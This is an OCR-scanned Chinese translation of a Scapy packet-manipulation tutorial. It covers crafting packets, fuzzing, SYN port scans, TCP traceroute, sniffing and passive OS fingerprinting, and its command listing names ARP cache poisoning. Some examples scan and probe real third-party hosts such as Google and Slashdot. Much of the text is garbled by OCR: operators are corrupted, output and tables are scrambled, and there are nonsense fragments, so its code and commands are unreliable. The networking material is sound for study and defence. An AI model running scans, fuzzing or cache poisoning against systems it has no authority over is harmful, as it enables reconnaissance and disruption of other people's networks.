虽然 没有 安装 ， 但 发 送 和 接收 数据 包 的 基本 功能 仍 能 有 效 。 


0x02 互动 教程 


本 节 将 会 告诉 您 一 些 Scapy 的 功能 。 让 我 们 按 上 文 所 述 打 开 Scapy， 亲 自 尝试 些 例 
子 吧 ° 


第 一 步 
让 我 们 来 建立 一 个 数据 包 试 一 试 


>>> a-IP(ttl-10) 

>>> a 

< IP ttl=40 |> 

>>> a.src 

CIAT sop 

>>> a.dst="192.168.1.1" 
>>> a 

< IP ttl=10 dst=192.168.1.1 |> 
>>> a.src 
'192.168.8.14" 

>>> del(a.ttl) 

>>> a 

< IP dst=192.168.1.1 |> 
>>> a.ttl 

64 


3E Ja E X (OSI 参考 模型 ) 


/ 操作 符 在 两 层 之 间 起 到 一 个 组 合 的 作用 。 当 使 用 该 操作 符 时 ， 下 层 可 以 根据 其 
上 层 ， 使 它 的 一 个 或 多 个 默认 字段 被 重 载 。 (您 仍 可 以 赋予 您 想 要 的 值 ) 一 个 字符 
串 也 可 以 被 用 作 原 料 层 ( raw layer ) ° 


>>> IP() 

<IP |> 

>>> IP()/TCP() 

«IP frag=0 proto=TCP |<TCP |>> 

>>> Ether()/IP()/TCP() 

<Ether type=0x800 |<IP frag=0 proto=TCP |<TCP |>>> 

>>> IP()/TCP()/"GET / HTTP/1.0\r\n\r\n" 

«IP frag=0 proto=TCP |«TCP |<Raw load='GET / HTTP/1.0\r\n\r\n' | 
>>> 

>>> Ether()/IP()/IP()/UDP() 

<Ether type=0x800 |<IP frag=0 proto=IP |<IP frag=0 proto=UDP |<U 
DP |>>>> 

>>> IP(proto=55)/TCP() 

«IP frag=0 proto=55 |<TCP |>> 


lower layer upper layer 


Default fields 





Fields overloaded 
by upper layet 





User set fields 





每 一 个 数据 包 都 可 以 被 建立 或 分 解 (注意 : 在 Python 中 _ (FRA) 是 上 一 条 语 
名 执行 的 结果 ) 


>>> Str(IP()) 
"E\xOO\xO00\x14\x00\x01\x00\xO0@\x00 | NXxe7NX7fNX00NX00NX01Nx7fNX00 
\x00\x01' 
>>> IP(_) 
«IP version=4L ihl=5L tos=0x0 len-20 id=1 flags= frag=0L ttl-64 
proto=IP 

chksum=0x7ce7 src=127.0.0.1 dst=127.0.0.1 |> 
>>>  a-Ether()/IP(dst-"www.slashdot.org")/TCP()/"GET /index.html 
HTTP/1.0 \n\n" 
>>> hexdump(a) 
00 02 15 37 A2 44 00 AE F3 52 AA D1 08 00 45 OO  ...7.D...R....E 


00 43 00 01 00 00 40 06 78 3C CO AS 05 15 42 23 .C....@.x<....B 
# 
FA 97 00 14 00 50 00 00 00 00 00 00 00 00 50 02 ..... Bo P 


20 00 BB 39 00 00 47 45 54 20 2F 69 6E 64 65 78 ..9..GET /inde 
x 

2E 68 74 6D 6C 20 48 54 54 50 2F 31 2E 30 20 OA .html HTTP/1.0 
0A 

>>> b=str(a) 

>>> b 
"\xOO\xO2\x157\xa2D\x00\xae\xf3R\xaa\xd1\x08\x00E\x00\xO0C\xOO\x 
01\x00\x00@\x06x<\xcO 
\xa8\x05\x15BH#\xfa\x97\x00\x14\xO0P\x00\x00\x00\x00\x00\x00\x00 
\xOOP\x02 \x00 

\xbb9\xOO\xOOGET /index.html HTTP/1.0 \n\n' 
>>> c=Ether(b) 
>>> C 
«Ether dst=00:02:15:37:a2:44 src=00:ae:f3:52:aa:d1 type=0x800 |< 
IP version=4L 

ihl-5L tos=0x0 len=67 id=1 flags= frag=0L ttl-64 proto=TCP chks 
um=0x783C 

src=192.168.5.21 dst=66.35.250.151 options='' |<TCP sport=20 dp 
ort-80 seq=OL 

ack=0L dataofs=5L reserved=0L flags=S window=8192 chksum=0xbb39 
urgptr=0 

options-[] |<Raw load-'GET /index.html HTTP/1.0 \n\n' |>>>> 


我 们 看 到 一 个 分 解 的 数据 包 将 其 所 有 的 字段 填充 。 那 是 因为 我 认为 ， 附 加 有 原始 字 
符 串 的 字段 都 有 它 自 身 的 价值 。 如 果 这 太 宛 长 ， hide_defaults() 方法 将 会 删除 
具有 默认 值 的 字段 : 


>>> c.hide defaults() 

>>> C 

«Ether dst=00:0f:66:56:fa:d2 src=00:ae:f3:52:aa:d1 type=0x800 |< 
IP ihl-5L len=67 

frag=0 proto-TCP chksum=0x783c src-192.168.5.21 dst=66.35.250.1 
51 |<TCP dataofs=5L 

chksum=0xbb39 options=[] |<Raw load='GET /index.html HTTP/1.0 \ 
n\n! |>>>> 


读 取 PCAP 文 件 
你 可 以 从 PCAP 文 件 中 读 取 数据 包 ， 并 将 其 写 入 到 一 个 PCAP 文 件 中 。 


>>> a=rdpcap("/spare/captures/isakmp.cap") 
>>> a 
«isakmp.cap: UDP:721 TCP:0 ICMP:0 Other:0> 


图 形 转 储 (PDF > PS) 


如 果 您 已 经 安装 PyX， 您 可 以 做 一 个 数据 包 的 图 形 PostScript/ PDF fik (ILTF d E 
陋 的 PNG 图 像 ，PostScript/PDF 则 具有 更 好 的 质量 ...) 


>>> a[423].pdfdump(layer shift-1) 
>>> a[423].psdump("/tmp/isakmp pkt.eps",layer shift-1) 


使 用 方法 











d 00:08:a1:00:3c 
t :08:a1:00:3c: 
src 00:06:5b:6b:66:f6 — =— 
type 0x800—_ 
ifs 
version 4L 
ihl a 
tos 0x0 
len 61———— 
id 28350 
flags DF 
frag OL —— 
ttl 64 
proto UDP— 
chksum 0x3b10 p. A fj ry Sy 
src 192.16848.—————— Z I J wid XJ 
dst 172.16.31.254 ^ = j PTT i aw 
options we P 4 f / 4 / / 
[UDP] We us si "m / V A 
sport KmP a uo P^ Lr J fF yf fj 
dport isakmp—— —— AAA / j 4 
ln 4——  / A EK M ff 
chksum 0x5794——— — P j t p vut) 
UP ge PF 
init.cookie 'x01.x01.:01x01[.]  —" / i ⁄ 
resp.cookie ' x01.x01.x01.x01.[...] m a 
next.payload CR nen 7 
version 0x10 — Se 
exch.type base pu. 
flags 0 — 6 P > oi 
id 33620225L .—7 —7 peat ut oam 
length 33L——— Len ur or 
EM eed e 
length $—— — e 
load "x27 
str(pkt) 组 装 数据 包 
hexdump(pkt) 十 六 进 制 转 储 
Is(pkt) 显示 出 字段 值 的 列表 
pkt.summary() 一 行 摘要 
pkt.show() 针对 数据 包 的 展开 试图 
pkt.show2() 显示 聚合 的 数据 包 (例如 ， 计 算 好 了 校 验 和 ) 
pkt.sprintf() 用 数据 包 字 段 填充 格式 字符 囊 
pkt.decode payload as() 7x "t payload &? decode 7 X 
pkt.psdump() 绘制 一 个 解释 说 明 的 PostScript 图 表 
pkt.pdfdump() 绘制 一 个 解释 说 明 的 PDF 
pkt.command() 返回 可 以 生成 数据 包 的 Scapy 命 
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生成 一 组 数据 包 


目前 我 们 只 是 生成 一 个 数据 包 。 让 我 们 看 看 如 何 轻 易 地 定制 一 组 数据 包 。 整 个 数据 
包 的 每 一 个 字段 (甚至 是 网 络 层 次 ) 都 可 以 是 一 组 。 在 这 里 隐 含 地 定义 了 一 组 数据 
包 的 概念 ， 意 即 是 使 用 所 有 区 域 之 问 的 稼 卡尔 乘积 来 生成 的 一 组 数据 包 。 


>>> 
>>> 
<IP 
>>> 


>>> 


<IP ttl=[1, 2, 


a=IP(dst="www.slashdot.org/30") 


a 


dst=Net('www.slashdot.org/30' ) 
[p for p in a] 
[<IP dst=66.35.250.148 |>, <IP dst=66.35.250.149 |>, 
<IP dst=66.35.250.150 |>, <IP dst=66.35.250.151 |>] 
>>> b=IP(ttl=[1,2,(5,9)]) 


b 


>>> [p for p in b] 
[<IP ttl=1 |>, <IP tt1=2 |>, 
<Ip #tl z Tp Ctl=80 
>>> c=TCP(dport=[80,443]) 

>>> [p for p in a/c] 


[<IP 
«IP 
«IP 
«IP 
«IP 
«IP 
«IP 
«IP 


frag-0 
frag-0 
frag-0 
frag-0 
frag-0 
frag-0 
frag-0 
frag-0 


proto-TCP 
proto-TCP 
proto-TCP 
proto-TCP 
proto-TCP 
proto-TCP 
proto-TCP 
proto-TCP 


(5, 9)] 


| > 


dst-66. 
dst-66. 
dst-66. 
dst-66. 
dst-66. 
dst-66. 
dst-66. 
dst-66. 


|> 


«IP ttl-5 |», «IP ttl-6 |», 
<IP tt1=9 |>] 


25. 
35. 
35. 
35. 
9o 
35. 
35. 
35. 


250. 
250. 
250. 
250. 
250. 
250. 
250. 
250. 


148 
148 
149 
149 
150 
150 
151 
151 


| <TCP 
| <TCP 
| <TCP 
| <TCP 
| <TCP 
| <TCP 
| <TCP 
| <TCP 


dport=80 |>>, 
dport=443 |>>, 
dport=80 |>>, 
dport=443 |>>, 
dport=80 |>>, 
dport=443 |>>, 
dport=80 |>>, 
dport=443 |>>] 


某 些 操作 〈 如 修改 一 个 数据 包 中 的 字符 串 ) 无 法 对 于 一 组 数据 包 使 用 。 在 这 些 情况 


下 ， 如 果 您 忘记 展开 您 的 数据 包 集 合 ， 只 有 


用 于 组 装 数据 包 。 


RE, 


woe 


记 生 成 的 列表 中 的 第 一 个 元 素 会 被 


> 


T 
summary() 
nsummary() 
conversations() 
show() 
filter() 
hexdump() 
hexraw() 
paddino() 
nzpadding() 
plot() 


make table() 


效果 
显示 一 个 关于 每 个 数据 包 的 摘要 列表 
同上 ， 但 规定 了 数据 包 数 量 
显示 一 个 会 话 图 表 


显示 首选 表示 ee Y 
返回 一 个 lambda 过 滤 后 的 数据 包 列表 
返回 所 有 数据 包 的 一 个 hexdump 

返回 所 以 数据 包 Raw layer 的 hexdump 

返回 一 个 带 填充 的 数据 包 的 hexdump 
返回 一 个 具有 非 零 填充 的 数据 包 的 hexdump 
规划 一 个 应 用 到 数据 包 列 表 的 lambda 亏 数 
根据 lambda 函 数 来 显示 表格 


发 送 数据 包 


现在 我 们 知道 了 如 何 处 理 数据 包 ° 让 我 们 来 看 看 如 何 发 送 它们 。 send() 函数 将 会 
oS Iced 为 你 处 理 路 由 和 第 2 层 的 数据 。 sendp() 函数 
会 工作 在 第 2 层 。 选 择 合适 的 接口 和 正确 的 链 路 层 协 议 都 取决 于 你 。 


>>> send(IP(dstz"1.2.3.4")/ICMP()) 


Sent 1 packets. 

>>> sendp(Ether()/IP(dst="1.2.3.4",ttl=(1,4)), iface="eth1") 
Sent 4 packets. 

>>> sendp("I'm travelling on Ethernet", iface="ethi", loop=1, in 
ter=0.2) 


Sent 16 packets. 
>>> sendp(rdpcap("/tmp/pcapfile")) # tcpreplay 


Sent 11 packets. 


Fuzzing 


fuzz() 函数 可 以 通过 一 个 具有 随机 值 、 数 据 类 型 合适 的 对 象 ， 来 改变 任何 默认 
值 ， 但 该 值 不 能 是 被 计算 的 ( 像 校 验 和 那样 )。 这 使 得 可 以 快速 建立 循环 模糊 化 测 
试 模板 。 在 下 面 的 例子 中 ，IP 层 是 正常 的 ，UDP 层 和 NTP 层 被 {fuzz。UDP 的 校 验 和 


是 正确 的 ，UDP 的 目的 端口 被 NTP 重 载 为 123， 而 且 NTP 的 版 本 被 更 变 为 4. 其 他 所 
有 的 端口 将 被 随机 分 组 : 


>>> send(IP(dst="target")/fuzz(UDP()/NTP(version=4) ), loop=1) 


Sent 16 packets. 


发 送 和 接收 数据 包 ( sr ) 


现在 让 我 们 做 一 些 有 趣 的 事情 。 sr() 函数 是 用 来 发 送 数据 包 和 接收 应 答 。 该 函数 
返回 一 对 数据 包 及 其 应 答 ， 还 有 无 应 答 的 数据 包 。 sr1() 函数 是 一 种 变 体 ， 用 来 
返回 一 个 应 答 数据 包 。 发 送 的 数据 包 必须 是 第 3 层 报 文 (IP，ARP 等 ) ° srp) M 
是 使 用 第 2 层 报 文 (AAA > 802.34) ° 


>>> p=sri(IP(dst="www.slashdot.org")/ICMP( )/"XXXXXXXXXXX" ) 
Begin emission: 

...Finished to send 1 packets. 

* 
Received 5 packets, got 1 answers, remaining © packets 
>>> p 
«IP version-4L ihl-5L tos-0x0 len=39 id=15489 flags= frag-OL ttl 
=42 proto-ICMP 

chksum=0x51dd src=66.35.250.151 dst-192.168.5.21 options-'' |<I 
CMP type=echo-reply 

code=0 chksum=0xee45 id=0x0 seq-0x0 |«Raw load='XXXXXXXXXXxX' 
|«Padding load='\x00\x00\x00\x00' |>>>> 
>>> p.show() 


ao ead ee 
version = 4L 
ihl = 5L 
tos = 0x0 
len = 39 
id = 15489 
flags = 
frag = OL 
ttl = 42 
proto = ICMP 
chksum = 0x51dd 
src = 66.35.250.151 
dst = 192.168.5.21 
options = Sa 
---[ ICMP ]--- 

type = echo-reply 

code = 0 

chksum = Oxee45 

id = 0x0 

seq = 0x0 
---[ Raw ]--- 

load SOOO 
--.[ Padding ]--- 
load = 'NX0ONXOONXOONXOO ' 


DNS 查询 ( rd = recursion desired) 。 主 机 192.168.5.1 是 我 的 DNS 服务 器 。 注 
意 从 我 Linksys 来 的 非 空 填充 具有 Etherleak 缺 陷 : 


>>> sri(IP(dst-z"192.168.5.1")/UDP()/DNS(rd-1, qd-DNSQR(qnamez"www 
.Slashdot.org"))) 
Begin emission: 
Finished to send 1 packets. 

* 
Received 3 packets, got 1 answers, remaining 0 packets 
«IP version-4L ihl=5L tos=0x0 len-78 id=0 flags-DF frag-OL ttl-6 
4 proto-UDP chksum-Oxaf38 

Src-192.168.5.1 dst-192.168.5.21 options-'' |«UDP sport-53 dpor 
t=53 len=58 chksum=0xd55d 

|<DNS id=0 qr=1L opcode=QUERY aa-0L tc-OL rd=1L ra=1L z=0L rcod 
e-ok qdcount=1 ancount=1 

nscount=0 arcount=0 qd-«DNSQR qname='www.slashdot.org.' qtype=A 
qclass=IN |> 

an=<DNSRR rrname='www.slashdot.org.' type-A rclass=IN ttl-3560L 
rdata='66.35.250.151' |> 

ns=0 ar=0 |«Padding load='\xc6\x94\xc7\xeb' |>>>> 


发 送 和 接收 函数 族 是 scapy 中 的 核心 部 分 。 它 们 返回 一 对 两 个 列表 。 第 一 个 就 是 发 
送 的 数据 包 及 其 应 答 组 成 的 列表 ， 第 二 个 是 无 应 答 数据 包 组 成 的 列表 。 为 了 更 好 地 
呈现 它们 ， 它 们 被 封装 成 一 个 对 象 ， 并 且 提 供 了 一 些 便于 操作 的 方法 : 


>>> sr(IP(dst="192.168.8.1")/TCP(dport=[21, 22, 23])) 

Received 6 packets, got 3 answers, remaining © packets 
(<Results: UDP:0 TCP:3 ICMP:0 Other:0», «Unanswered: UDP:0 TCP:0 
ICMP:0 Other :0>) 

>>> ans, unans=_ 

>>> ans.summary() 

IP / TCP 192.168.8.14:20 > 192.168.8.1:21 S ==> Ether / IP / TCP 
192.168.8.1:21 > 192.168.8.14:20 RA / Padding 

IP / TCP 192.168.8.14:20 > 192.168.8.1:22 S ==> Ether / IP / TCP 
192.168.8.1:22 > 192.168.8.14:20 RA / Padding 

IP / TCP 192.168.8.14:20 > 192.168.8.1:23 S ==> Ether / IP / TCP 
192.168.8.1:23 > 192.168.8.14:20 RA / Padding 


如 果 对 于 应 答 数据 包 有 速度 限制 ， 你 可 以 通过 inter 参数 来 设置 两 个 数据 包 之 间 
等 待 的 时 间 间 隔 。 如 果 有 些 数据 包 丢 失 了 ， 或 者 设置 时 间 间 隔 不 足以 满足 要 求 ， 你 
可 以 重新 发 送 所 有 无 应 答 数据 包 。 你 可 以 简单 地 对 无 应 答 数据 包 列表 再 调用 一 遍 函 
数 ， 或 者 去 设置 retry 参数 。 如 果 retry 设 置 为 3，scapy 会 对 无 应 答 的 数据 包 重 复 
发 送 三 次 。 如 果 retry 设 为 -3，scapy 则 会 一 直 发 送 无 应 答 的 数据 包 ， 直 

到 。 timeout 参数 设置 在 最 后 一 个 数据 包 发 出 去 之 后 的 等 待 时间 : 


SYN Scans 


在 Scapy 提 示 符 中 执行 一 下 命令 ， 可 以 对 经 典 的 SYN Scan 初始 化 : 


>>> sri(IP(dst="72.14.207.99")/TCP(dport=80, flags="S") ) 


ë 


以 上 向 Google 的 80 端 口 发 送 了 一 个 SYN 数 据 包 ， 会 在 接收 到 一 个 应 答 后 退出 : 


Begin emission: 

.Finished to send 1 packets. 

* 

Received 2 packets, got 1 answers, remaining © packets 

«IP version-4L ihl-5L tos=0x20 len-44 id-33529 flags= frag=OL t 
t1=244 

proto=TCP chksum=0x6a34 src=72.14.207.99 dst=192.168.1.100 optio 
ns=// | 

<TCP sport=www dport-ftp-data seq=2487238601L ack=1 dataofs=6L 
reserved=0L 

flags=SA window=8190 chksum=0xcdc7 urgptr=0 options-[('MSS', 536 


R 
«Padding load='V\xf7' |>>> 


从 以 上 的 输出 中 可 以 看 出 ，Google 返 回 了 一 个 SA (SYN-ACK) 标志 位 ， 表 示 80 端 
口 是 open 的 。 


使 用 其 他 标志 位 扫描 一 下 系统 的 440 到 443 端 口 : 


>>> sr(IP(dst="192.168.1.1")/TCP(sport=666, dport=(440, 443), flags 
="S")) 


或 者 


>>> sr(IP(dst="192.168.1.1")/TCP(sport=RandShort(),dport=[440, 44 
1,442,443], flags="S") ) 


可 以 对 收集 的 数据 包 进 行 摘要 (summary) ， 来 快速 地 浏览 响应 : 


>>> ans,unans = . 
>>> ans.summary() 


IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:440 S ======> IP / 
TCP 192.168.1.1:440 » 192.168.1.100:ftp-data RA / Padding 
IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:441 S ======> IP / 
TCP 192.168.1.1:441 » 192.168.1.100:ftp-data RA / Padding 
IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:442 S ======> IP / 
TCP 192.168.1.1:442 » 192.168.1.100:ftp-data RA / Padding 
IP / TCP 192.168.1.100:ftp-data » 192.168.1.1:https S ------» IP 


/ TCP 192.168.1.1:https » 192.168.1.100:ftp-data SA / Padding 


以 上 显示 了 我 们 在 扫描 过 程 中 的 请 求 应 答对 。 我 们 也 可 以 用 一 个 循环 只 显示 我 们 感 
兴趣 的 信息 : 


>>> ans.summary( lambda(s,r): r.sprintf("%TCP.sport% Nt %TCP.fla 


gs*") ) 

440 RA 
441 RA 
442 RA 
https SA 


可 以 使 用 make_table() 函数 建立 一 个 表格 ， 更 好 地 显示 多 个 目标 信息 : 


>>> ans,unans = sr(IP(dst-["192.168.1.1", "yahoo.com", "slashdot.o 
rg"])/TCP(dport=[22, 80,443], flags="S") ) 

Begin emission: 

Geen re *.**. ,.,....Finished to send 9 packets. 

Received 362 packets, got 8 answers, remaining 1 packets 

>>> ans.make_table( 

lambda(s,r): (s.dst, s.dport, 

r.sprintf("{TCP:%TCP. flags%}{ICMP:%IP.src% - %ICMP.type%} 


"))) 
66.35.250.150 192.168.1.1 216.109.112.135 
22 66.35.250.150 - dest-unreach RA - 
80 SA RA SA 
443 SA SA SA 


在 以 上 的 例子 中 ， 如 果 接 收 到 作为 响应 的 ICMP 数 据 包 而 不 是 预期 的 TCP 数 据 包 ° 
就 会 打印 出 ICMP 差 错 类 型 (errortype) ° 


对 于 更 大 型 的 扫描 ， 我 们 可 能 对 茶 个 响应 感 兴趣 ， 下 面 的 例子 就 只 显示 设置 
了 "SA" 标 志 位 的 数据 包 : 


>>> ans.nsummary(lfilter = lambda (s,r): r.sprintf("%TCP.flags%" 
) == "SA" ) 

0003 IP / TCP 192.168.1.100:ftp_data > 192.168.1.1:https S ===== 
=> IP / TCP 192.168.1.1:https > 192.168.1.100:ftp_data SA 


如 果 我 们 想 对 响应 进行 专业 分 析 ， 我 们 可 以 使 用 使 用 以 下 的 命令 显示 哪些 端口 是 
Open 的 : 


>>> ans.summary(lfilter = lambda (s,r): r.sprintf("%TCP.flags%" ) 
== "SA", prn=lambda(s,r):r.sprintf("%TCP.sport% is open") ) 
https is open 


对 于 更 大 型 的 扫描 ， 我 们 可 以 建立 一 个 端口 开放 表 : 


>>> ans.filter(lambda (s,r):TCP in r and r[TCP].flags&2).make ta 

ble(lambda (s,r): 

is (s.dst, s dport, "X")) 
66.35.250.150 192.168.1.1 216.109.112.135 

80 X = X 

443 X X X 


如 果 以 上 的 方法 还 不 够 ，Scapy 还 包含 一 个 report ports() 函数 ， 该 函数 不 仅 可 
以 自动 化 SYN scan， 而 且 还 会 对 收集 的 结果 以 LaTeX 形 式 输 出 : 


>>> report ports("192.168.1.1",(440,443)) 
Begin emission: 

.*.**Finished to send 4 packets. 
* 
Received 8 packets, got 4 answers, remaining © packets 
'\\begin{tabular}{|r]1]1]}\n\\hline\nhttps & open & SA \\\\\n\\h 
line\n440 
& closed & TCP RA \\\\\n441 & closed & TCP RA \\\\\n442 & close 
d & 
TCP RA \\\\\n\\hLline\n\\hline\n\\end{tabular}\n' 


TCP traceroute 


TCP 路 由 追踪 : 


>>> ans,unans-sr(IP(dst-target, ttl-(4,25),id-RandShort())/TCP(f 
lags-0x2)) 


foc Mu cp ut cm c onmsedoroesends22'pgackets- 
*** 


Received 33 packets, got 21 answers, remaining 1 packets 
>>> for snd,rcv in ans: 
print snd.ttl, rcv.src, isinstance(rcv.payload, TCP) 


571947517 159: 65 0 

6 194.51.159.49 0 

4 194.250.107.181 0 
7 193.251.126.34 0 
8 193.251.126.154 0 
9 193.251.241.89 0 
10 193.251.241.110 
11 193.251.241.173 
13 208.172.251.165 
12 193.251.241.173 
14 208.172.251.165 
15 206.24.226.99 0 
16 206.24.238.34 0 
17 173.109.66.90 0 
18 173.109.88.218 0 
Jg $920 39] T 
20 173.29.39.101 
21 173.29.39.101 
22 T3 20 39-10] 
23 1732292395101. 
24 173.29.39.101 


@ @ @ @ O 


eee qe qus quie qus 


注意 : TCP 路 由 跟踪 和 其 他 高 级 函数 早已 被 构造 好 了 : 


>>> lsc() 
sr 

sri 

irst answer 
srp 

srpi 


: Send and receive packets at layer 3 
: Send packets at layer 3 and return only the f 


: Send and receive packets at layer 2 
: Send and receive packets at layer 2 and retur 


n only the first answer 


srloop 
e answer each time 
srploop 

e answer each tine 
sniff 


Send a packet at layer 3 in loop and print th 


Send a packet at layer 2 in loop and print th 


: Sniff packets 


pof Passive OS fingerprinting: which OS emitted t 

his TCP SYN ? 

arpcachepoison Poison target's cache with (your MAC,victim's 
IP) couple 

send : Send packets at layer 3 

sendp : Send packets at layer 2 

traceroute : Instant TCP traceroute 

arping : Send ARP who-has requests to determine which 

hosts are up 

ls List available layers, or infos on a given 1 

ayer 

lsc : List user commands 

queso : Queso OS fingerprinting 

nmap fp nmap fingerprinting 

report ports : portscan a target and output a LaTeX table 

dyndns. add : Send a DNS add message to a nameserver for "n 

ame" to have a new "rdata" 

dyndns. del : Send a DNS delete message to a nameserver for 
"name" 

[...] 

配置 高 级 sockets 


发 送 和 接收 数据 包 的 过 程 


Sniffing 


是 相当 复杂 的 。 


我 们 可 以 简单 地 捕获 数据 包 ， a 或 tethereal 的 功能 。 如 果 没 有 指 
定 interface， 则 会 在 所 有 的 interface 上 进行 噢 探 : 


>>> sniff(filter="icmp and host 66.35.250.151", count-2) 
«Sniffed: UDP:0 TCP:0 ICMP:2 Other:0> 


So ee 
>>> a.nsummary() 


0000 Ether / IP / ICMP 192.168.5.21 echo-request 0 / Raw 


0001 Ether / IP / ICMP 192.168.5.21 echo-request 0 / Raw 

>>> a[1] 

«Ether dst=00:ae:f3:52:aa:d1 src=00:02:15:37:a2:44 type=0x800 |< 
IP version=4L 

ihl=5L tos=0x0 len=84 id=0 flags-DF frag=OL ttl-64 proto-ICMP c 
hksum=0x3831 

Src-192.168.5.21 dst-66.35.250.151 options='' 
request code=0 

chksum=0x6571 id=0x8745 seq-0x0 |<Raw load='B\xf7g\xda\x00\x07u 
m\xO8\t\n\xOb 

NXOCNENXOeNXOf NX10NX11NX12NX13NX14NX15NX16NX17NX18NX19Nx1aNX1bN 
X1cNx1d 

Nx1eNx1f !\x22#$%&\'()*+, -./01234567' 


|«ICMP type=echo- 


| >>>> 


>>> sniff(iface-"wifiO", prn-lambda x: x.summary()) 

802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSI 
D / Info Rates / Info DSset / Info TIM / Info 133 

802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / I 
nfo SSID / Info Rates 

802.11 Management 5 00:0a:41:ee:a5:50 / 802.11 Probe Response / 
Info SSID / Info Rates / Info DSset / Info 133 

802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / I 
nfo SSID / Info Rates 

802.11 Management 4 ff:ff:ff:ff:ff:ff / 802.11 Probe Request / I 
nfo SSID / Info Rates 

802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSI 
D / Info Rates / Info DSset / Info TIM / Info 133 

802.11 Management 11 00:07:50:d6:44:3f / 802.11 Authentication 
802.11 Management 11 00:0a:41:ee:a5:50 / 802.11 Authentication 
802.11 Management 0 00:07:50:d6:44:3f / 802.11 Association Reque 


st / Info SSID / Info Rates / Info 133 / Info 149 


802.11 Management 1 00:0a:41:ee:a5:50 / 802.11 Association Respo 
nse / Info Rates / Info 133 / Info 149 

802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSI 
D / Info Rates / Info DSset / Info TIM / Info 133 

802.11 Management 8 ff:ff:ff:ff:ff:ff / 802.11 Beacon / Info SSI 
D / Info Rates / Info DSset / Info TIM / Info 133 

802.11 / LLC / SNAP / ARP who has 172.20.70.172 says 172.20.70.1 
71 / Padding 


802.11 / LLC / SNAP / ARP is at 00:0a:b7:4b:9c:dd says 172.20.70 


21/2 


/ Padding 


802.11 / LLC / SNAP / IP / ICMP echo-request 0 / Raw 
802.11 / LLC / SNAP / IP / ICMP echo-reply 0 / Raw 
>>> sniff(iface="ethi", prn-lambda x: x.show()) 


---[ Ethernet ]--- 
dst = 00:ae:f3:52:aa:d1 
src = 00:02:15:37:a2:44 
type = 0x800 
Beh PREY jese 

version = 4L 

ihl - 5L 

tos = 0x0 

len = 84 

id = 0 


flags - DF 
frag - OL 
ttl = 64 
proto = ICMP 
chksum = 0x3831 
src = 192.168.5.21 
dst = 66.35.250.151 
options =! 
---[ ICMP ]--- 
type = echo-request 
code = 0 
chksum = 0x89d9 
id = 0xc245 
seq = 0x0 
---[ Raw ]--- 
load = 'B\xf71\xa9\x00\x04\x149\xO08\t\n\xOb\xOc\r\ 


XOeNxOf Nx10NX11NX12NX13NX14NX15NX16NX17NX18NX19Nx1aNx1bNx1cNx1dN 
x1eNx1f !\x22#$%&\'()*+, -./01234567' 
---[ Ethernet ]--- 


dst = 00:02:15:37:a2:44 
Src = 00:ae:f3:52:aa:d1 
type = 0x800 
ES SEES 5 
version - 4L 
ihl - 5L 
tos = 0x0 
len = 84 
id = 2070 
flags = 
frag = OL 
ttl = 42 
proto = ICMP 
chksum = 0x861b 
src = 66.35.250.151 
dst = 192.168.5.21 
options =! 
---[ ICMP ]--- 
type = echo-reply 
code = 0 
chksum = 0x91d9 
id = 0xc245 
seq = 0x0 
---[ Raw ]--- 
load = 'B\xf7i\xa9\xO0\xO04\x149\xO8\t\n\xOb\xOc\r\ 


XxOe\XOF\XLO\XLA\XL2\X13\X14\xX15\x16\x17\x18\x19\xla\xib\xic\xid\ 
x1e\x1f !\x22#$%&\'()*+, -./01234567' 
---[ Padding ]--- 

load = '\n_\x00\x0b' 


对 于 控制 输出 信息 ， 我 们 可 以 使 用 sprintf() Bae: 


>>> pkts = sniff(prn-lambda x:x.sprintf("{IP:%IP.src% -> %IP.dst 
%\n}{Raw: %Raw. load%\n}") ) 
192.168.1.100 -> 64.233.167.99 


64.233.167.99 -> 192.168.1.100 
192.168.1.100 -> 64.233.167.99 


192.168.1.100 -> 64.233.167.99 

"GET / HTTP/1.1\r\nHost: 64.233.167.99\r\nUser-Agent: Mozilla/5. 
0 

(X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071022 Ubuntu/7. 
10 (gutsy) 

Firefox/2.0.0.8NrNnAccept: text/xml,application/xml,application/ 
xhtml+xm1, 

text/html; q=0.9, text/plain; q=0.8, image/png, */*; q=0.5\r\nAccept-L 
anguage: 

en-us,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAccept -Charse 
t: 

ISO-8859-1, utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 300\r\nConnection: 
keep-aliveNrNnCache-Control: max-age=0\r\n\r\n' 


我 们 可 以 嗅 探 并 进行 被 动 操 作 系 统 指纹 识别 : 


>>> p 
«Ether dst=00:10:4b:b3:7d:4e src=00:40:33:96:7b:60 type=0x800 |< 
IP version=4L 

ihl=5L tos=0x0 len=60 id-61681 flags=DF frag-OL ttl-64 proto-TC 
P chksum=0xb85e 

Src-192.168.8.10 dst-192.168.8.1 options-'' |<TCP sport-46511 d 
port-80 

seq=2023566040L ack=0L dataofs-10L reserved=0L flags-SEC window 
-5840 

chksum=0x570c urgptr=0 options-[('Timestamp', (3429402011, OL)) 
, ('MSS', 1460), 

('NOP', ()), ('SACkOK', ''), ('WScale', 0)] |>>> 
>>> load module("pOf") 
>>> pOf(p) 

(rO [SIE 22452) 2.7414 (01) 7] 
>>> a-sniff(prn-prnpOf) 

(dor Ex 2-22 ae kA D 

人 让) 

(0.875, ['Linux 2.4.2 - 2.4.14 (1)', 'Linux 2.4.10 (1)', Window 
s 98 (?)']) 

(1.0, ['Windows 2000 (9)']) 


青 测 操作 系统 版 本 前 的 数字 为 猜测 的 精确 度 。 


演示 一 下 bpf 过 


滤器 和 sprintf() 方 法 : 


>>> a=sniff(filter="tcp and ( 
prn=lambda x: x.Sprintf("%IP. 
dport% %2s,TCP.flags% : %TCP. 


192.168.8. 
213.228.0. 
192.168.8. 
213.228.0. 
23@pop2-1. 


192.168.8. 
192.168.8. 


213.228.0. 
213.228.0. 


192.168.8. 
192.168.8. 


213.228.0. 
failed 


192.168.8. 
213.228.0. 
192.168.8. 
213.228.0. 


10:47226 -> 213.228. 
14:110 -> 192.168.8. 
10:47226 -> 213.228. 
